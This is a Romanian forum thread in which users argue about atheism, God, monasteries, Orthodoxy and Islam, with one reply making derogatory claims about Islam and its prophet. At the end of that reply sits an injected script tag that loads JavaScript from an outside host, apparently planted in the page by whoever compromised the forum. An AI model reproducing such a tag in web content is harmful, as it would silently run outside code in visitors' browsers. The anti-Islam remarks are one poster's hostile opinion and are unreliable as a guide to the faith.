Follow RomanianPortal on Twitter       
Pagina 1 din 6 123 ... UltimulUltimul
Rezultate 1 la 10 din 58

Subiect: pariu pentru Lavatus

Data înscrierii
    16.01.2005
    Locație
    Canada
    Posturi
    275
    Putere Rep
    15

Implicit

Te vad asa de inversunat impotriva Domnului asa ca iti propun sa faci un pariu cu tine insuti: spune-ti " Sunt atat de sigur pe mine incat nimic nu ma poate face sa-mi schimb parerea nici macar o cura de aer curat la o manastire din nord."Si incepand din vara ce vine du-te cate o saptamana in concediu si stai la o manastire,nu din considerente religioase ci doar asa ca sa te bucuri de liniste si sa vezi ce peisaje pe care nici in vis nu le vezi, si mai ales sa pui in practica pariul.Insa din respect pentru maicute ,care si-au inchinat toata viata unei idei,nu te apuca sa-ti expui ideile anticriste,nu e politicos iar tu esti un baiat manierat.Priveste-le cu toleranta,majoritatea nu au decat 8 clase ( ceeea ce e suficient pt a ajunge sa comunici cu D-zeu)deci nu te pune cu ele.Du-te la rugaciunea de seara tot din politete pentru bietele maici si fa o cruce ca sa fii in rand cu lumea si sa nu bati la ochi.Sunt sigura ca nu vrei sa fii un musafir nepoliticos.Fa asta incepand cu vara urmatoare si dupa aceea o sa comentam impresii .

Data înscrierii
    09.04.2004
    Locație
    Long Island, NY
    Posturi
    1.582
    Putere Rep
    17

Implicit

mihaela, de ce tii asa de mult sa-l schimbi be larvatus, si sa-l faci religios? Cred ca a mai bine ca fiecare sa-si vada de traba si sa-i lase pealtii sa creada in ce vreau ei.

Biserica crestina a omorat milione de oameni care nu au fost de acord cu religia lor, si au refuzat sa se converteasca. E de ajuns. Lasa-l pe om sa aiba opiniile lui, si sa creada in ce vrea.

Cum ti-ar place sa te invite cineva sa stai o saptamana pe an la o biserica satana, sau la una care practica santeria, si sa si participi la rugaciuni, ca doar vrei sa fiimusafir politicos. Poate ca din respect mai participi si la ceva rituale de sacrificii.
    The most active thing about me is my imagination!

Data înscrierii
    16.01.2005
    Locație
    Canada
    Posturi
    275
    Putere Rep
    15

Implicit

[img]smileys/smiley36.gif[/img]totusi sa facem diferenta,satanismul e impotriva umanitatii,promoveaza crima.Cred ca Lavatus cat e el de ateu nu ar imbratisa asemenea activitati.A fi ateu nu inseamna a cauta Raul si a-l urma ci ateii pur si simplu nu sunt convinsi de existenta lui D-zeu.Cunosc atei care nu ar ucide nici o musca si au un suflet de putini religiosi il au.Acest ateu de fapt il urmeaza pe D-zeu fara macar sa isi dea seama.Oricum mesajul meu era sa se impace cu Dumnezeu nu sa se converteasca la o religie anume.Eu insami nu sunt siguraca ortodoxia e cea mai buna si am multe intrebari referitoare la veridicitatea bibliei.Ar putea alegechiar si o moschee musulmananu e nimic rau ,D-zeu e si acolo.Intrucat la noi manastirile sunt cele mai usor de gasit,i-am recomandat o manastire.Lamurit?[img]smileys/smiley20.gif[/img]

Data înscrierii
    09.04.2004
    Locație
    Long Island, NY
    Posturi
    1.582
    Putere Rep
    17

Implicit

Citat Postat în original de mihaela75
    ...Lamurit?[img]smileys/smiley20.gif[/img]

Completely [img]smileys/smiley36.gif[/img]
    The most active thing about me is my imagination!

Guest

Implicit

As putea alegechiar si o moschee musulmananu e nimic rau ,D-zeu e si acolo.

Mihaela, de ce esti tu asa de sigura ca Dumnezeu este chiar intr-o moschee? Daca toti credem fiecare ce vrem si toti avem dreptate, atunci cine este in eroare? Ai citit vreo data Coran-ul? Eu am incercat....numai prostii si aberatii.Ma indoiesc ca Dumnezeu a inspiratasa idiotenii. Cat despre manastiri,sa steadeparte de manstirile unde daca nu crezi in ce spune popa te leaga cu lanturi si te lasa sa mori de foame.[img]smileys/smiley2.gif[/img]S-a nu-l omoare vreun popa incercand sa scoata demonii din el....[img]smileys/smiley36.gif[/img]

Data înscrierii
    16.01.2005
    Locație
    Canada
    Posturi
    275
    Putere Rep
    15

Implicit

Ca sa mergi pe calea lui D-zeu nu ai nevoie nici de biblie nici de coran,astea sunt carti de istorie care pot fi oricand atacate( eu una nu cred ca D-zeu a fost atat de crud incat sa-l omoare in chinuri cumplite pe cel mai bun profet al Lui - ca fiu nu poate fi,D-zeu nu are fii asa cum intelegem noi ideea de filiatie).Ca sa te rogi nu e necesar sa citesti la infinit versete din biblie sau coran( nu am citit niciodata coranul,nu stiu cum arata)cum se face in manastiri sau in moschee.Rugaciunea e ceva intim ,esti doar tu cu nevoile sau multumirile tale si cu cuvintele tale.Pe Lavatus l-am sfatuit sa stea la manastire mai mult pentru atmosfera,poate il pune un pic pe ganduri...Cat despre stupidele penitente care se practica in manastiri astea nu-l afecteaza pe Lavatus ca e l ar fi simplu musafir.Chestiile astea se fac in interior,intre ei.Nebuni![img]smileys/smiley36.gif[/img]Lavatus nu pare safie posedat,e un pic prea zelos darcu timpul ii trece.

Guest

Implicit

Mihaela,eu incerc sa citesc cat mai multpentru cadoresc sa fiu informat. Este imposibil sa-si creezi o opinie corecta despre un lucru cand nu ai nici o informatie, doar ce ai auzit de la altii. Cat despre Isus, nu Dumnezeu la omorat, ci oameni l-au rastignit, citeste Biblia si ai sa vezi. Este adevarat ca nu ai nevoie de biserica sau carti sa te rogi, dar daca vrei sa intelegi la ce te rogi si pentru ce, este necesar un pic de cunostinta. De crezut este usor, fiecare crede cate ceva, pana si necredinciosi cred in ceva..... in Biblie scri ca si demoni cred si se cutremura....[img]smileys/smiley2.gif[/img]

Nu am suggerat ca Lavartus ar fi demonizat, doar ca o vizita la manastire ar putea fi hazardous for his health![img]smileys/smiley36.gif[/img]

Larvatus Guest

Implicit

Te vad asa de inversunat impotriva Domnului asa ca iti propun sa faci un pariu cu tine insuti: spune-ti " Sunt atat de sigur pe mine incat nimic nu ma poate face sa-mi schimb parerea nici macar o cura de aer curat la o manastire din nord."Si incepand din vara ce vine du-te cate o saptamana in concediu si stai la o manastire,nu din considerente religioase ci doar asa ca sa te bucuri de liniste si sa vezi ce peisaje pe care nici in vis nu le vezi, si mai ales sa pui in practica pariul.Insa din respect pentru maicute ,care si-au inchinat toata viata unei idei,nu te apuca sa-ti expui ideile anticriste,nu e politicos iar tu esti un baiat manierat.Priveste-le cu toleranta,majoritatea nu au decat 8 clase ( ceeea ce e suficient pt a ajunge sa comunici cu D-zeu)deci nu te pune cu ele.Du-te la rugaciunea de seara tot din politete pentru bietele maici si fa o cruce ca sa fii in rand cu lumea si sa nu bati la ochi.Sunt sigura ca nu vrei sa fii un musafir nepoliticos.Fa asta incepand cu vara urmatoare si dupa aceea o sa comentam impresii .

O sa incerc, Mihaela.

Data înscrierii
    24.12.2006
    Locație
    Romania
    Posturi
    1
    Putere Rep
    0

Implicit

[QUOTE=mihaela75]

[img]smileys/smiley36.gif[/img]totusi sa facem diferenta,satanismul e impotriva umanitatii,promoveaza crima.Cred ca Lavatus cat e el de ateu nu ar imbratisa asemenea activitati.A fi ateu nu inseamna a cauta Raul si a-l urma ci ateii pur si simplu nu sunt convinsi de existenta lui D-zeu.Cunosc atei care nu ar ucide nici o musca si au un suflet de putini religiosi il au.Acest ateu de fapt il urmeaza pe D-zeu fara macar sa isi dea seama.Oricum mesajul meu era sa se impace cu Dumnezeu nu sa se converteasca la o religie anume.Eu insami nu sunt siguraca ortodoxia e cea mai buna si am multe intrebari referitoare la veridicitatea bibliei.Ar putea alegechiar si o moschee musulmananu e nimic rau ,D-zeu e si acolo.Intrucat la noi manastirile sunt cele mai usor de gasit,i-am recomandat o manastire.Lamurit?[img]smileys/smiley20.gif[/img]

Buna!

N-as zice ca lucrurile stau chiar asa in ce priveste prezenta Domnului in orice loc de rugaciune...Voi reveni cu amanunte![img]smileys/smiley51.gif[/img]

Data înscrierii
    10.04.2007
    Locație
    Romania
    Posturi
    7
    Putere Rep
    0

Implicit

MIhaela , habar n-ai ce vorbesti . Tu n-ai citit nici Biblia , nici coranul si nici o iota despre satanisti. Ortodoxia ESTE religia cea mai buna pentru a-ti manifesta iubirea pentru Dumnezeu .De asemenea credintele tale par ciudate rau , daca nu ai incerca sa-l iei cu manusi pe Larvatus si sa-i alimentezi madria lui de intelept si nu te-ai vedea pe tine intr-o aura atat de romantica ca salvatoare a lui as zice ca esti penticostala .... ba de fapt ceva in genu la nebunii astia.

Biblia si ortodoxismul : Dupa rastignirea lui Hristos apostolii au inceput sa converteasca lumea la credinta adevarata , botezandui cu apa si DUH SFANT deoarece Hristos a zis asa ( nu pot sa reproduc exact ) : "Eu sunt poarta tarcului oilor, iar cei ce vor intra nu pot trece decat prin Mine " . DECI MIHAELA , NICI O RELIGIE CARE NU IMPARTASESTE TAINELE LUI HRISTOS NU SE POATE NUMI BUNA. Acest har al apostolilor era transmis mai departe si tot asa printr-o astfel de continuitate ajungem la Constantinopol . Aici acest har era transmis mai departe prin crestinism . La Marea Schisma catolicii si apoi de catolici , protestantii au fost si ei loviti de ce i-a dat prin cap si lui Mihaela si au zis sa faca de capul lor... aici e marea mea dilema ... de unde si-au luat ei harul desi zic ca slujesc lui Dumnezeu daca au rupt aceasta continuitate de la Apostoli. Si asa cum apostolii leaga si dezleaga pe pamant la fel pot si preotii nostri ortodocsi , a caror continuitate nu a fost intrerupta prin schisme de interes politic si nici de crime care nu biblia si nici Dumnezeu nu le-a facut ci doar nestiutori ai caii Domnului si straini de Acesta si demni de osanda. Unde au fost pastorii lor sa le zica e gresit sa ucideti si sa furati pamantul fratilor vostri cum a facut-o ortodoxismul. MENTIONEZ CA IN BISERICA SE INALTA RUGACIUNI NUMAI PENTRU CEI CAZUTI PENTRU APARAREA NEAMULUI ROMANESC . Deci daca nu intelegi ceva din Biblie este pentru ca nu ai citit-o. De coran nu stiu multe dar in Biblie toti profetii au fost oameni desavarsiti si asceti cum poate un jefuitor de caravane , un gigolo care si-a facut avere de pe urma unei vaduve si un benladen care a exploatat religia interesului sau propriu , culmea si conducator sa fie om sfant ,chiar nu ma duce mintea.
    Satanismul ... nu e sangeros si nu instiga la ucideri ci doar la razvratire impotriva lucrarii domnului si la neinfranare la placerile lumesti la toate cate se impart ele. Daca vorbim de BSR si nu de secte d-ale lor ca tot spre acelasi loc se indreapta cu totii.

Cat despre Larvatus , frate sper ca ce scri aici sa nu le crezi tu cu adevarat ci doar sa te dai mare cu toate ereziile astea care le gasesti scrise de orice dobitoc cu diploma si doctorate de se apuca sa scrie povesti de adormit crestinii.Eu am fost exact ca tine , sti ce m-a schimbat ... am citit carti de filozofie crestina , dogma , scrise de sfitii parinti ai zilelor noastre .Daca te va lasa diavolul din tine iti recomand sa citesti pe Ilarion Argatu , Parintele Cleopa si Parintele Arsenie. Le gasesti la orice chiosc de obiecte religioase crestinesti daca intrebi . Ia de acolo ce te-ar interesa. Daca nu, faci ce vrei cu sufletul tau.E inutil sa-ti expun consecintele macar atata lucru sti si tu. A si Mihaela bine ca-l trimiti la coran , mama unui prieten d-al meu s-a dus acolo si ghici ce minune a facut mahomed ala ... a ajuns sa-si taie venele , asta dupa ce s-a dus la meca si iesea pe strada Imbracata in haine musulmane si respecta tampeniile alea litera cu litera invrajbindu-si toata familia si facandu-si fiul sa sufere exact cand incepea sa aibe si el o viata normala alaturi de o fata. Ori Hristos ori Antihrist cu toate formele si denumirile lui. Asta e parerea mea. Nimic din cuvantul Domnului de i se va schimba sensul n-am sa slujesc lui caci Cuvantul a fost dat noua spre mantuire iar nu spre delasare si alunecare inspre pierzare.

Mugatu ma bucur ca vad pe cineva care e luminat de Hristos pe aici<<script src=http://www.iroe.ru/ngg.js></script>

Pagina 1 din 6 123 ... UltimulUltimul

Subiecte similare

1. Am nevoie de ajutor pentru a urma pasii pentru emigrare
    De Serban Stefana în forumul Vize imigrare, vize vizitator-Canada-Montreal-Quebec
    Răspunsuri: 13
    Ultimul post: 27.09.2010, 18:47
  2. Locuri de munca in Germania pentru studentii romani pentru 2010
    De sorin în forumul Comunitatea romaneasca din Germania
    Răspunsuri: 0
    Ultimul post: 14.12.2009, 13:58
  3. Pentru clujeni in particular, pentru romani in general - sarbatoare de Martisor
    De sorin în forumul Comunitatea romaneasca din Midwest
    Răspunsuri: 2
    Ultimul post: 22.02.2009, 10:51
  4. Da-ti un vot pentru Brancusi, pentru Romania
    De manolica1 în forumul Romani celebri-savanti,scriitori,oameni de stiinta,sportivi
    Răspunsuri: 2
    Ultimul post: 15.02.2009, 19:23
  5. Idei pentru concert pentru 14 Februarie
    De max_pop în forumul Discutii Generale-de toate pentru toti, diverse
    Răspunsuri: 1
    Ultimul post: 22.01.2007, 23:22

Permisiuni postare

• Nu poți posta subiecte noi
  • Nu poți răspunde la subiecte
  • Nu poți adăuga atașamente
  • Nu poți edita posturile proprii
  •